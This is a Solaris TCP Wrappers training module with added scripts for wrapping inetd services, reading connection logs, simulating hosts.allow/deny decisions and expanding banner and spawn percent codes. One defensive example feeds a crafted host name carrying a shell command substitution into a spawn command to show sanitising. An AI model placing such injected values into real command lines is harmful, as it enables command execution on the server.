Note – The general recommendation is to leave the daemons where they are and change the /etc/inetd.conf file. It is easier to maintain one file during patch installation or software upgrades than to locate and move several programs.

Installing Hidden TCP Wrappers

Configure hidden TCP Wrappers by moving the standard network programs to a predetermined directory and replacing them with the tcpd program.

To configure FTP to use TCP Wrappers, do the following:

# mkdir /usr/save
# mv /usr/sbin/in.ftpd /usr/save
# cp tcpd /usr/sbin/in.ftpd

The directory that stores the real network programs is compiled into the TCP Wrappers programs and is set to the /usr/sbin directory for the SVR4 package. However, this configuration means that the hidden configuration cannot be used with this package because the saved programs and the tcpd program must reside in the same directory.

To use the hidden configuration, obtain the TCP Wrappers source files and build TCP Wrappers specifying an alternate directory (for example /usr/save). Full instructions are included in the online tcpd(1M) manual page and the Makefile shipped with TCP Wrappers.

Installing Visible TCP Wrappers

Configure visible TCP Wrappers by updating the service entry in /etc/inetd.conf to use the tcpd program. The name of the real program is specified as the first command line parameter. The actual network server program must be in the search path used by tcpd. The Solaris OE default search path includes the /usr/sbin directory, where all the network server programs are installed.

To configure FTP to use visible TCP Wrappers replace this inetd.conf line:

ftp stream tcp6 nowait root /usr/sbin/in.ftpd in.ftpd

with:

ftp stream tcp nowait root /usr/local/sbin/tcpd in.ftpd

Besides changing the executable program, the configuration also removes support for TCP/IP version 6. At the present time, TCP Wrappers are not compatible with the Solaris OE support for TCP/IP v6.
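The rewrite just described (tcpd substituted for the server program, the real program name kept as the first argument, and tcp6 changed to tcp) is mechanical enough to script. The following Python function is an added example, not course material and not part of the TCP Wrappers package. It assumes the Sun Freeware path /usr/local/sbin/tcpd, rewrites only TCP stream services that run a real program, and leaves comments, internal services, UDP services such as tftp, and lines that already run tcpd alone, so it can be run more than once. The sample inetd.conf lines are constructed for the example.

```python
"""Rewrite Solaris 8 inetd.conf entries to use visible TCP Wrappers.

Added example; not part of the SC-300 course material or the TCP Wrappers
package. It applies the change shown above (program path replaced by tcpd,
the real program name kept as the first argument, tcp6 downgraded to tcp
because tcpd does not handle IPv6) to every TCP stream service that runs a
real server program.
"""

TCPD = "/usr/local/sbin/tcpd"          # path used by the Sun Freeware package

# Constructed sample of /etc/inetd.conf lines; not copied from a live system.
SAMPLE_INETD_CONF = """\
# Ftp and telnet are standard Internet services.
ftp     stream  tcp6    nowait  root    /usr/sbin/in.ftpd       in.ftpd
telnet  stream  tcp6    nowait  root    /usr/sbin/in.telnetd    in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd    in.fingerd
login   stream  tcp6    nowait  root    /usr/sbin/in.rlogind    in.rlogind
tftp    dgram   udp6    wait    root    /usr/sbin/in.tftpd      in.tftpd -s /tftpboot
echo    stream  tcp6    nowait  root    internal
"""


def wrap_line(line):
    """Return (new_line, changed) for one inetd.conf line.

    Only stream tcp/tcp6 services with a real program path are rewritten;
    comments, internal services, datagram services and lines that already
    run tcpd are returned unchanged.
    """
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return line, False
    fields = stripped.split()
    if len(fields) < 6:
        return line, False          # malformed; leave it for the administrator
    service, socktype, proto, wait, user, program = fields[:6]
    args = fields[6:]
    if socktype != "stream" or proto not in ("tcp", "tcp6"):
        return line, False
    if program in ("internal", TCPD):
        return line, False
    # The real daemon name becomes tcpd's first argument; tcpd locates it on
    # its compiled-in search path (/usr/sbin for the SVR4 package).
    real = args[0] if args else program.rsplit("/", 1)[-1]
    extra = args[1:]
    new_fields = [service, socktype, "tcp", wait, user, TCPD, real] + extra
    return "\t".join(new_fields), True


def wrap_inetd_conf(text):
    """Rewrite a whole inetd.conf; returns (new_text, [changed services])."""
    out, changed = [], []
    for line in text.splitlines():
        new, did = wrap_line(line)
        out.append(new)
        if did:
            changed.append(line.split()[0])
    return "\n".join(out) + "\n", changed


if __name__ == "__main__":
    new_text, services = wrap_inetd_conf(SAMPLE_INETD_CONF)
    print(new_text)
    print("wrapped:", ", ".join(services))
```

Run the output through tcpdchk -av before replacing /etc/inetd.conf, and send inetd a HUP signal afterwards so that it rereads the file.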

Checking TCP Wrappers’ Configuration

TCP Wrappers include a check program called tcpdchk which validates the TCP Wrapper installation.

The tcpdchk program examines the access control files (see “Configuring Host Access Control” on page 15-16), and validates the entries in these files against entries in the network configuration files. The tcpdchk program reports problems, such as non-existent path names, services not controlled by tcpd that appear in access control files, services that should not be wrapped, non-existent host names, or non-Internet address forms.

To get a comprehensive report, run the program with the following options:

# tcpdchk -av

To check an individual host for access to a specific service use the tcpdmatch command (host access control is described in “Configuring Host Access Control” on page 15-16).

# tcpdmatch in.ftpd grommit
warning: in.ftpd: service possibly not wrapped
client: hostname grommit
client: address 192.168.0.1
server: process in.ftpd
access: granted

Configuring Client Access Logging

TCP Wrappers log all network services to the Syslog program. Logging uses the mail facility and generates the following message levels:

● info – Messages for successful network connections

● warning – Messages for denied network access

● error – Messages for incorrect configuration files

Configure the /etc/syslog.conf file to log TCP Wrapper messages, as shown in Code 15-1.

Code 15-1 Configuring the syslog.conf File

# grep mail /etc/syslog.conf
*.err;kern.notice;auth.notice;mail.warning	/dev/sysmsg
mail.info;mail.warning	/var/adm/network.log

The following example is the log of a successful client connection:

May 25 11:10:08 wallace in.telnetd[931]: [ID 927837 mail.info] connect from grommit
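Once tcpd records are going to /var/adm/network.log, the useful next step is to read them back in bulk rather than one line at a time. The following Python script is an added example, not course material and not part of TCP Wrappers. It parses the two record kinds tcpd writes (mail.info "connect from" for granted connections and mail.warning "refused connect from" for denied ones), skips unrelated mail-facility lines such as sendmail's, counts outcomes per client and service, and lists clients whose refusals reach a threshold. The log lines are constructed for the example; the host names and addresses are made up.

```python
"""Summarise TCP Wrappers connection records from a Solaris syslog file.

Added example, not part of the course or of TCP Wrappers. It parses the
mail.info 'connect from' and mail.warning 'refused connect from' records
that tcpd writes and reports, per client and service, how many connections
were granted and refused, flagging clients whose refusals reach a threshold.
"""
import re
from collections import defaultdict

# Solaris 8 syslog line: timestamp host daemon[pid]: [ID nnnnnn facility.level] message
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<server>\S+) "
    r"(?P<daemon>[\w.]+)\[(?P<pid>\d+)\]: \[ID \d+ mail\.(?P<level>\w+)\] "
    r"(?P<verdict>refused connect|connect) from (?P<client>\S+)$"
)

# Constructed sample of /var/adm/network.log; hosts and addresses are made up.
SAMPLE_LOG = """\
May 25 11:09:45 wallace in.telnetd[915]: [ID 947420 mail.warning] refused connect from 192.168.99.1
May 25 11:09:52 wallace in.telnetd[918]: [ID 947420 mail.warning] refused connect from 192.168.99.1
May 25 11:10:08 wallace in.telnetd[931]: [ID 927837 mail.info] connect from grommit
May 25 11:10:40 wallace in.ftpd[940]: [ID 927837 mail.info] connect from 192.168.1.7
May 25 11:11:03 wallace in.telnetd[952]: [ID 947420 mail.warning] refused connect from 192.168.99.1
May 25 11:12:17 wallace sendmail[960]: [ID 702911 mail.info] AA00960: from=root, size=312
"""


def parse_line(line):
    """Return a dict for a tcpd record, or None for any other syslog line."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["refused"] = rec["verdict"].startswith("refused")
    return rec


def summarise(text):
    """Count granted/refused connections per (client, daemon)."""
    counts = defaultdict(lambda: {"granted": 0, "refused": 0})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue                    # not a tcpd record (sendmail, etc.)
        key = (rec["client"], rec["daemon"])
        counts[key]["refused" if rec["refused"] else "granted"] += 1
    return dict(counts)


def noisy_clients(text, threshold=3):
    """Clients with at least `threshold` refusals across all services."""
    per_client = defaultdict(int)
    for (client, _daemon), c in summarise(text).items():
        per_client[client] += c["refused"]
    return sorted(c for c, n in per_client.items() if n >= threshold)


if __name__ == "__main__":
    for (client, daemon), c in sorted(summarise(SAMPLE_LOG).items()):
        print("%-14s %-12s granted=%d refused=%d"
              % (client, daemon, c["granted"], c["refused"]))
    print("repeatedly refused:", noisy_clients(SAMPLE_LOG))
```

To run it against the real file, read /var/adm/network.log into a string and pass it to summarise() or noisy_clients(); the regular expression is anchored to the Solaris 8 message layout with the [ID ...] tag, so lines from other syslog formats are ignored rather than misread.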

Configuring Host Access Control

Solaris OE provides a standard mechanism for host access control. It uses the /etc/hosts.allow and /etc/hosts.deny files to set access control rules. Host access does not read entire files; when a matching entry is found, the rule is applied and no additional rules are taken into account.

TCP Wrappers review the files in the following order:

1. /etc/hosts.allow – An entry here grants client access.

2. /etc/hosts.deny – An entry here denies client access.

3. If the files are empty or do not exist, access is allowed.

The default access control allows all hosts to have access to all services.

Note – Any host not explicitly mentioned, or covered by an implicit rule, is allowed.

TCP Wrappers use the Solaris OE host access control mechanism to authorize remote host access to network services.

Access File Format

Each access file consists of one or more lines with the following colon-separated fields:

service : client : options

where:

● service – The name of the service to allow or block, or the value ALL for all services. Specify multiple services in a comma-separated list.

● client – The host name, IP address, network address or domain name of the clients to allow or block. Specify multiple clients in a comma-separated list or use the keyword ALL for all clients.

● A client name beginning with a dot (.) is assumed to be a partial domain name (for example .sun.com) and refers to all hosts in that domain or subdomain.

● A client name ending with a dot is assumed to be a network address (for example 192.168.0.) and refers to all hosts on that subnet.

● As a safeguard against client address spoofing, TCP Wrappers validate host names and addresses using a DNS server and reject clients if a discrepancy is found.

● options – Allow the definition of banners (see “Using Banners With TCP Wrappers” on page 15-19) and the spawning of commands (see “Using TCP Wrappers to Spawn Commands” on page 15-25).

Code 15-2 sets a default to explicitly deny all hosts access to all services.

Code 15-2 Example hosts.deny File Entry

# more /etc/hosts.deny
ALL: ALL

Your hosts.deny file should always contain the entry in Code 15-2 as the very last line.

Code 15-3 shows an allow file example.

Code 15-3 Example hosts.allow File Entry

# more /etc/hosts.allow
in.ftpd: 192.168.1., 192.168.2.
in.telnetd, in.rlogind: wallace, grommit, sean

Code 15-3 allows all hosts on subnets 192.168.1 and 192.168.2 to use FTP and hosts wallace, grommit, and sean to use the telnet and rlogin commands.
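The decision rules above (hosts.allow first, then hosts.deny, then allow by default, with the first matching line winning) are easy to state and easy to get wrong in a real file, which is why the ALL: ALL line must come last. The following Python simulation is an added example, not course material and not the hosts_access library itself. It parses the access file format, applies the client patterns described on this page (ALL, leading-dot domain suffix, trailing-dot network prefix, exact host name or address) and returns the same granted/denied verdict that tcpdmatch reports. The EXCEPT operator, netmask forms and the KNOWN, UNKNOWN and PARANOID wildcards of the real implementation are not modelled; the copies of the Code 15-2 and 15-3 files are constructed inline.

```python
"""Simulate the hosts.allow / hosts.deny decision described above.

Added example; not the course's own code and not the real hosts_access
library. It implements the documented order (hosts.allow first, then
hosts.deny, then allow by default; first matching rule wins) and the client
patterns explained on this page. EXCEPT, netmask forms and the
KNOWN/UNKNOWN/PARANOID wildcards of the real implementation are omitted.
"""


def parse_rules(text):
    """Parse 'service : client [: options]' lines into (services, clients, options)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        parts = [p.strip() for p in line.split(":")]
        if len(parts) < 2:
            raise ValueError("bad access rule: %r" % raw)
        services = [s.strip() for s in parts[0].split(",")]
        clients = [c.strip() for c in parts[1].split(",")]
        rules.append((services, clients, parts[2:]))
    return rules


def client_matches(pattern, hostname, address):
    """Apply one client pattern to a connecting host."""
    if pattern == "ALL":
        return True
    if pattern.startswith("."):                   # .sun.com -> domain suffix
        return hostname.lower().endswith(pattern.lower())
    if pattern.endswith("."):                     # 192.168.1. -> network prefix
        return address.startswith(pattern)
    return pattern.lower() == hostname.lower() or pattern == address


def service_matches(pattern, service):
    return pattern == "ALL" or pattern == service


def first_match(rules, service, hostname, address):
    """Return the first rule that matches, or None (later rules are not read)."""
    for rule in rules:
        services, clients, _options = rule
        if any(service_matches(s, service) for s in services) and \
           any(client_matches(c, hostname, address) for c in clients):
            return rule
    return None


def hosts_access(allow_text, deny_text, service, hostname, address):
    """Return ('granted' | 'denied', matching rule or None), like tcpdmatch."""
    hit = first_match(parse_rules(allow_text), service, hostname, address)
    if hit:
        return "granted", hit
    hit = first_match(parse_rules(deny_text), service, hostname, address)
    if hit:
        return "denied", hit
    return "granted", None          # no rule in either file: default is allow


# Constructed copies of the Code 15-2 and Code 15-3 files from this page.
HOSTS_ALLOW = """\
in.ftpd: 192.168.1., 192.168.2.
in.telnetd, in.rlogind: wallace, grommit, sean
"""
HOSTS_DENY = "ALL: ALL\n"


if __name__ == "__main__":
    for svc, host, addr in [("in.ftpd", "penguin", "192.168.1.7"),
                            ("in.ftpd", "penguin", "192.168.99.1"),
                            ("in.telnetd", "grommit", "192.168.1.2"),
                            ("in.rlogind", "penguin", "192.168.1.2")]:
        verdict, rule = hosts_access(HOSTS_ALLOW, HOSTS_DENY, svc, host, addr)
        print("%-11s %-8s %-13s access: %s" % (svc, host, addr, verdict))
```

Because first_match() stops at the first hit, a specific deny entry placed after ALL: ALL in hosts.deny is never consulted, and any banner or spawn options on it are never applied; that is the practical reason the catch-all line belongs at the end of the file.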

The following is a sample log file entry where a client system was denied access:

May 25 11:09:45 wallace in.telnetd[915]: [ID 947420 mail.warning] refused connect from 192.168.99.1

Using Banners With TCP Wrappers

Banners allow you to display notification messages to clients before they log in to a system or when they are denied service. You can configure banner messages as options for any entry in the hosts.allow and hosts.deny files.

The banner option format is:

:banners message_directory

where the message_directory is a directory containing one file for each type of service for which banner is specified. Each file name has the same name as the service with which it is used. Code 15-4 shows an example banner configuration.

Code 15-4 Banner Configuration

# more /etc/hosts.deny
ALL: ALL: banners /etc/tcpd.deny
# ls /etc/tcpd.deny
in.ftpd in.telnetd
# more /etc/tcpd.deny/in.ftpd
220 Sorry but you are not authorized to use this FTP service.

An unauthorized client trying to use FTP or telnet services receives the banner message, while authorized clients receive the FTP or telnet service. Clients denied access to other services do not see any output and their connection is refused.

Building Banner Files

Some network services such as FTP require that the banner messages be in a special format (FTP messages must start with 220). To simplify the creation of banner messages, the TCP Wrappers package includes a Banners.Makefile which creates suitable service-specific banners from a template message file called prototype.

The Banners.Makefile file is included in the TCP Wrappers installation directory. If the SVR4 package from the Sun Freeware site is used, this file is installed in the /usr/local/doc/tcp_wrappers directory. Copy the make file to the banners message directory, rename it Makefile, create the prototype message file, and run the make command as shown in Code 15-5.

Code 15-5 Building Banner Files

# mkdir /etc/tcpd.deny
# cd /etc/tcpd.deny
# cp /usr/local/doc/tcp_wrappers/Banners.Makefile Makefile
# cat > prototype
Service unavailable
# make

Customizing a Banner Message

You can customize the text in the banner message files using the following substitution codes:

● %a – Client’s IP address (for example 192.168.1.1)

● %c – Client’s canonical host name (for example wallace.sun.com)

● %d – Server’s daemon (for example in.ftpd)

● %h – Client’s host name (for example wallace)

● %n – Client’s name (for example wallace)

● %p – Process ID (for example 2134)

● %s – Server daemon and host name (for example in.ftpd@grommit)

● %u – Client user (for example alice)

● %A – Server’s IP address (for example 192.102.1.93)

● %H – Server’s host name (for example grommit)

● %N – Server name (for example grommit)

● %% – A percent sign

Code 15-6 shows an example of the text file using substitution codes.

Code 15-6 Using Banner Substitution Codes

# cat /etc/tcpd.deny/in.telnetd

Warning! You have attempted to connect to a secure system
from %a, also known as %h (username %u). Your attempt has been logged.

The file in Code 15-6 expands to produce the output shown in Code 15-7.

Code 15-7 Banner File Output

# telnet wallace
Trying 192.168.1.1...
Connected to wallace.
Escape character is '^]'.
Warning! You have attempted to connect to a secure system
from penguin, also known as penguin (username unknown). Your attempt has
been logged.

Using Banners Without TCP Wrappers

You do not have to use TCP Wrappers just for producing banners. Most interactive network services allow a BANNER option in their default configuration files, as follows:

● Banner for FTP:

# more /etc/default/ftpd
BANNER="This is a secure host!"

● Banner for telnet :

# more /etc/default/telnetd
BANNER="\nWARNING!\nUnauthorized access will be prosecuted!\n"

● Banner for telnet , rlogin , and other logins:

# more /etc/issue
This host is monitored at all times. Violations may result in
disciplinary action.

Using TCP Wrappers to Spawn Commands

You can run commands and scripts in the same way as banners. Use commands to send a page or email a message when a client connects or attempts to connect.

The spawn option format is:

:spawn command

where command is any UNIX command, including pipelines and I/O redirection. The command line is executed by the Bourne shell (/bin/sh), and you can use the same percent-letter substitution as the banner option (see “Customizing a Banner Message” on page 15-22).

Note – The default path for the tcpd daemon is PATH=/usr/bin:/usr/sbin. Use absolute path names for commands not in these directories.

If the system has a command called pager in the /usr/local/bin directory which reads a message from standard input and sends the message to the pager number on the command line, you could set up a general intruder alert, as shown in Code 15-8.

Code 15-8 Setting Up an Intruder Alert

# cat /etc/hosts.deny
ALL: ALL: spawn echo "intruder %h(%a) detected at `date`" | /usr/local/bin/pager 123 876 5432

If you need both banner and spawn options, include them in any order on the line in the hosts.* file. For example, if you want to track online whether a particular client used the telnet command, add a line like the following to the hosts.allow file:

in.telnetd: penguin: banners /etc/tcpd.allow: spawn echo "%h has connected" | write root
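The percent-letter substitution used by both the banner files (see “Customizing a Banner Message”) and the spawn option above is worth seeing as code, because the substituted values (client host name, user name) come from the network, and in a spawn command they are interpolated into a /bin/sh command line. The following Python expander is an added example, not course material and not the tcpd implementation. It handles every code in the table, treats %% as a literal percent sign, leaves unknown codes as written (an assumption; tcpd may differ), and, when expanding for the shell, replaces shell metacharacters in substituted values with underscores, the protection hosts_access(5) documents for tcpd (the exact character set used here is an assumption). The Code 15-6 banner text and the connection details are constructed inputs.

```python
"""Expand the %-codes tcpd substitutes into banner files and spawn commands.

Added example; not part of the course or of TCP Wrappers. Covers the codes
listed under "Customizing a Banner Message" and shows why the same expansion
needs care in a spawn command: the substituted values arrive from the
network, so shell metacharacters in them are replaced by underscores before
the string reaches /bin/sh. The character set below is an assumption; the
real tcpd documents the replacement but this is not its code.
"""

# Characters that would change the meaning of a Bourne shell command line.
SHELL_META = set("`'\"\\;&|<>$(){}^*[]?\n")


def sanitize(value):
    """Replace shell-special characters in a value substituted into a command."""
    return "".join("_" if ch in SHELL_META else ch for ch in value)


def expand(template, ctx, for_shell=False):
    """Substitute tcpd %-codes from ctx (keys a, c, d, h, n, p, s, u, A, H, N).

    %% yields a single percent sign; codes not in ctx are left as written.
    With for_shell=True every substituted value is passed through sanitize().
    """
    out = []
    i = 0
    while i < len(template):
        ch = template[i]
        if ch == "%" and i + 1 < len(template):
            code = template[i + 1]
            if code == "%":
                out.append("%")
                i += 2
                continue
            if code in ctx:
                val = str(ctx[code])
                out.append(sanitize(val) if for_shell else val)
                i += 2
                continue
        out.append(ch)
        i += 1
    return "".join(out)


def context(client_addr, client_host, daemon, server_host, server_addr,
            pid, user="unknown", client_canon=None):
    """Build the substitution table for one connection (values supplied by the caller)."""
    canon = client_canon if client_canon is not None else client_host
    return {
        "a": client_addr, "c": canon, "h": client_host, "n": client_host,
        "d": daemon, "s": "%s@%s" % (daemon, server_host), "u": user,
        "A": server_addr, "H": server_host, "N": server_host, "p": str(pid),
    }


# Constructed inputs: the Code 15-6 banner text and a made-up connection.
BANNER = ("Warning! You have attempted to connect to a secure system\n"
          "from %a, also known as %h (username %u). Your attempt has been logged.\n")
SPAWN = 'echo "intruder %h(%a) detected" | /usr/local/bin/pager 123'


if __name__ == "__main__":
    ctx = context("192.168.1.5", "penguin", "in.telnetd", "wallace",
                  "192.168.1.1", 2134)
    print(expand(BANNER, ctx))
    # A host name carrying a backquote is neutralised before the shell sees it.
    hostile = context("10.9.9.9", "evil`uname`", "in.ftpd", "wallace",
                      "192.168.1.1", 7)
    print(expand(SPAWN, hostile, for_shell=True))
```

The expand() call without for_shell reproduces the Code 15-7 output from the Code 15-6 template; the call with for_shell=True shows what a spawn line should receive when the client-controlled %h value contains a shell metacharacter.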

Checking Host Access Configuration

The tcpdmatch command performs configuration checks by checking the access control files and demonstrating the behavior. Use this command to perform error checking before you deploy the TCP Wrappers.

The syntax for the tcpdmatch command is:

tcpdmatch service host

where:

● service is the service name such as in.telnetd

● host is the client host name or IP address

Code 15-9 shows an example.

Code 15-9 Using the tcpdmatch Command

# tcpdmatch in.telnetd grommit
client: address 192.168.1.2
server: process in.telnetd
access: allowed
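The following shell script is an added example, not part of this course or of the TCP Wrappers distribution. It emulates the decision that tcpdmatch reports for the simple "daemon_list : client_list [: option]" lines used in this module, including the "allow a named list, deny ALL" pattern from the exercise. It uses the tcpd search order (hosts.allow first, then hosts.deny, otherwise allow) and understands ALL, LOCAL, exact names, ".domain" suffixes, "net." prefixes and comma-separated lists; real tcpd also handles netmasks, EXCEPT, KNOWN and PARANOID, which this script does not. The hosts.allow and hosts.deny contents are constructed sample data written to temporary files.

```shell
#!/bin/sh
# Added example, not part of the course: a small emulation of the
# tcpdmatch decision for the "daemon_list : client_list [: option]"
# line format used in this module. Real tcpd understands much more
# (netmasks, EXCEPT, KNOWN, PARANOID); this handles ALL, LOCAL, exact
# names, ".domain" suffixes, "net." prefixes and comma-separated lists.

# Constructed stand-ins for /etc/hosts.allow and /etc/hosts.deny.
HOSTS_ALLOW=$(mktemp)
HOSTS_DENY=$(mktemp)
printf '%s\n' 'in.telnetd: wallace, grommit' 'in.ftpd: LOCAL' > "$HOSTS_ALLOW"
printf '%s\n' 'in.telnetd: ALL: banners /etc/tcpd.deny' 'ALL: ALL' > "$HOSTS_DENY"

# token_matches PATTERN NAME -> 0 if one access-list token covers NAME
token_matches() {
    pat=$1; subj=$2
    case "$pat" in
        ALL)     return 0 ;;
        LOCAL)   case "$subj" in *.*) return 1 ;; *) return 0 ;; esac ;;
        .*)      case "$subj" in *"$pat") return 0 ;; esac ;;  # domain suffix
        *.)      case "$subj" in "$pat"*) return 0 ;; esac ;;  # address prefix
        "$subj") return 0 ;;
    esac
    return 1
}

# list_matches LIST NAME -> 0 if any token in the comma/space list matches
list_matches() {
    for tok in $(printf '%s' "$1" | tr ',' ' '); do
        token_matches "$tok" "$2" && return 0
    done
    return 1
}

# file_matches FILE SERVICE HOST -> 0 if some rule in FILE matches both
file_matches() {
    while IFS= read -r line; do
        case "$line" in ''|'#'*) continue ;; esac
        daemons=$(printf '%s' "$line" | cut -d: -f1)
        clients=$(printf '%s' "$line" | cut -d: -f2)
        list_matches "$daemons" "$2" || continue
        list_matches "$clients" "$3" && return 0
    done < "$1"
    return 1
}

# tcpd_match SERVICE HOST -> prints "allowed" or "denied", using the
# tcpd search order: hosts.allow first, then hosts.deny, else allowed.
tcpd_match() {
    if file_matches "$HOSTS_ALLOW" "$1" "$2"; then
        echo allowed
    elif file_matches "$HOSTS_DENY" "$1" "$2"; then
        echo denied
    else
        echo allowed
    fi
}

tcpd_match in.telnetd wallace          # allowed: listed in hosts.allow
tcpd_match in.telnetd penguin          # denied:  in.telnetd: ALL in hosts.deny
tcpd_match in.ftpd penguin             # allowed: LOCAL matches a name with no dot
tcpd_match in.ftpd ftp.example.com     # denied:  ALL: ALL in hosts.deny
```

The last case shows why the exercise ends with an "ALL: ALL"-style deny line: a service that is not mentioned in hosts.allow and not covered by a deny rule is allowed, so a catch-all deny is what turns the configuration into "deny everything except what is listed". On a real host, run the real tcpdmatch against the real files; this script only illustrates the search order.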


Exercise: Authenticating Network Services

In this exercise, you complete the following tasks:

● Install TCP Wrappers

● Enable logging for telnet connections

● Configure TCP Wrappers to deny telnet access to specific hosts

● Configure TCP Wrappers to warn of denied telnet access

● Configure TCP Wrappers to deny access to all hosts except those specified

Preparation

There is no specific preparation needed for these exercises.

Tasks

You are not required to finish all of the tasks in the time allocated by the instructor. However, ensure that you remove all host access control files as described in “Removing Host Access Control” on page 15-36 so that host access control does not affect future module exercises.

Task – Installing TCP Wrappers

In this task, you install the TCP Wrappers executable tcpd program:

1. Download the TCP Wrappers package from the Sun Freeware Web site. A copy has already been downloaded and saved in the /usr/local/pkg directory.

2. Install this SVR4 package using the pkgadd command.


Task – Enabling Logging for telnet Connections

In this task, you configure TCP Wrappers to log network connections for telnet:

1. Configure your telnet service to use visible TCP Wrappers (modify the /etc/inetd.conf file). TCP Wrappers do not support TCP/IPv6, so you must change the service type from tcp6 to tcp.

2. Enable logging for this service to the Syslog command.

Task – Denying Access to Specific Hosts

In this task, you configure the host access control feature of the Solaris OE so that TCP Wrappers can deny telnet access to specific hosts:

1. Modify your TCP Wrappers configuration so that your workstation is denied access to its own telnet service.

2. Send a banner to the telnet client indicating that access is denied.

3. Check your configuration using the tcpdmatch command.

Task – Configuring TCP Wrappers to Warn of Denied telnet Access

Enhance your TCP Wrappers configuration to use the write command to send a message to the root user whenever an attempt to use the telnet command is denied (include the client IP address and host name in the message).

Task – Configuring TCP Wrappers to Deny Access to All Hosts Except Those Specified

In this task, you create a secure host access control configuration which denies access to all hosts except those explicitly specified in the configuration files:

1. Configure your system so that all systems other than your workstation and the instructor’s workstation are denied access to the telnet service.

2. Remove all access controls for network services on your system.


Task – Removing Host Access Control

In this task, remove your host access files to prevent host access control from interfering with future module exercises.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following paragraphs describe the Solaris OE commands necessary to solve the problems posed in the exercises for this module.

Installing TCP Wrappers

1. Download the TCP Wrappers package from the Sun Freeware Web site. A copy has already been downloaded and saved in the /usr/local/pkg directory.

2. Install this SVR4 package using the pkgadd command.

# cd /usr/local/pkg
# pkgadd -d tcp_wrappers-7.6-sol8-sparc-local

Enabling Logging for telnet Connections

1. Configure your telnet service to use visible TCP Wrappers (modify the /etc/inetd.conf file). TCP Wrappers do not support TCP/IPv6, so you must change the service type from tcp6 to tcp:

a. Edit the /etc/inetd.conf file and comment out the telnet line:

#telnet stream tcp6 nowait root /usr/sbin/in.telnetd in.telnetd

b. Type a new telnet entry which uses the tcpd program in the /usr/local/sbin directory and does not include support for TCP/IPv6:

telnet stream tcp nowait root /usr/local/sbin/tcpd in.telnetd

c. Identify the PID for the inetd command and send it the hang-up signal so that it reads the configuration file again:

# ps -ef | grep inetd
...
# kill -HUP <inetd PID>
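The edit in steps a and b is easy to get wrong by hand (a leftover tcp6 entry, or two active telnet lines). The shell script below is an added example, not part of the course or of any Sun tool: it makes the same change on a file, commenting out the active entry and appending a tcpd-wrapped entry that uses plain tcp. It works on a constructed copy of an inetd.conf so it runs anywhere; the tcpd path /usr/local/sbin/tcpd is the one the course uses, and INETD_CONF would be set to /etc/inetd.conf (after taking a backup) on a real host, followed by the kill -HUP of inetd shown in step c.

```shell
#!/bin/sh
# Added example, not part of the course: wrap the telnet entry of an
# inetd.conf with tcpd, as the exercise solution does by hand. It works
# on a constructed copy so it can run anywhere; on a real host, back up
# /etc/inetd.conf, set INETD_CONF to it, then send inetd SIGHUP.

INETD_CONF=$(mktemp)
TCPD=/usr/local/sbin/tcpd    # path of the tcpd binary from the course package

# Constructed sample with Solaris 8 style entries (not a real system file).
cat > "$INETD_CONF" <<'EOF'
# constructed inetd.conf sample
ftp     stream  tcp6    nowait  root    /usr/sbin/in.ftpd       in.ftpd
telnet  stream  tcp6    nowait  root    /usr/sbin/in.telnetd    in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd    in.fingerd
EOF

# active_entry FILE SERVICE: print the uncommented entry for SERVICE
active_entry() {
    grep "^$2[[:space:]]" "$1"
}

# wrap_service FILE SERVICE DAEMON: comment out the live entry for
# SERVICE and append one that runs DAEMON through tcpd over plain tcp
# (tcpd does not support tcp6, so the type changes from tcp6 to tcp).
# Safe to run twice: an entry already pointing at tcpd is left alone.
wrap_service() {
    f=$1; svc=$2; daemon=$3
    active_entry "$f" "$svc" | grep -q "[[:space:]]$TCPD[[:space:]]" && return 0
    tmp=$(mktemp)
    sed "s|^$svc\([[:space:]]\)|#$svc\1|" "$f" > "$tmp" && mv "$tmp" "$f"
    printf '%s\tstream\ttcp\tnowait\troot\t%s\t%s\n' "$svc" "$TCPD" "$daemon" >> "$f"
}

wrap_service "$INETD_CONF" telnet in.telnetd
active_entry "$INETD_CONF" telnet    # prints the new tcpd-wrapped telnet line
```

After the change there is exactly one active telnet line and it names tcpd, not in.telnetd, as the server program; in.telnetd is now only the argument that tcpd executes once the access control check passes. The original tcp6 entry survives as a comment so it can be restored as in the cleanup step of the exercise.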

2. Enable logging for this service to the Syslog utility:

a. Update the /etc/syslog.conf file so that it logs all mail messages to the sc300log file (tcpd logs through the mail facility by default). Separate the selector from the file name with a tab character, not spaces:


# vi /etc/syslog.conf
mail.info        /var/adm/sc300log

b. Send the hang-up signal to the syslogd command to get it to read the new configuration:

# ps -ef | grep syslogd
...
# kill -HUP <syslogd PID>

c. Test your changes by running the telnet command from a shell window to connect back to your system:

# telnet localhost

Denying Access to Specific Hosts

1. Modify your TCP Wrappers configuration so that your workstation is denied access to its own telnet service:

a. Identify your host name using:

# hostname

b. Create the /etc/hosts.deny file and add the following line to this file to block your own workstation (replace hostname with the name reported by the hostname command):

in.telnetd: hostname

c. Check the configuration with:

# tcpdmatch in.telnetd wallace
client: hostname wallace
client: address 192.168.1.1
server: process in.telnetd
access: denied

d. Test your changes by running the telnet command from a shell window to connect back to your system. You should receive your banner message rather than a telnet session:

# telnet localhost

2. Send a banner to the telnet client indicating that access is denied:

a. Edit the /etc/hosts.deny file and change the entry for your workstation to:


in.telnetd: hostname : banners /etc/tcpd.deny

b. Create a new directory called /etc/tcpd.deny :

# mkdir /etc/tcpd.deny

c. Create a banner file for the telnet service and enter a suitable “service denied” message:

# cat >/etc/tcpd.deny/in.telnetd
Go away %h you are not allowed access to this service
^D

d. Test your changes by running the telnet command from a shell window to connect back to your system. You should receive your banner message rather than a telnet session:

# telnet localhost
Go away wallace you are not allowed access to this service

3. Check your configuration with the tcpdmatch command:

# tcpdmatch in.telnetd localhost
client: address 192.168.0.1
server: process in.telnetd
access: denied

Configuring TCP Wrappers to Warn of Denied telnet Access

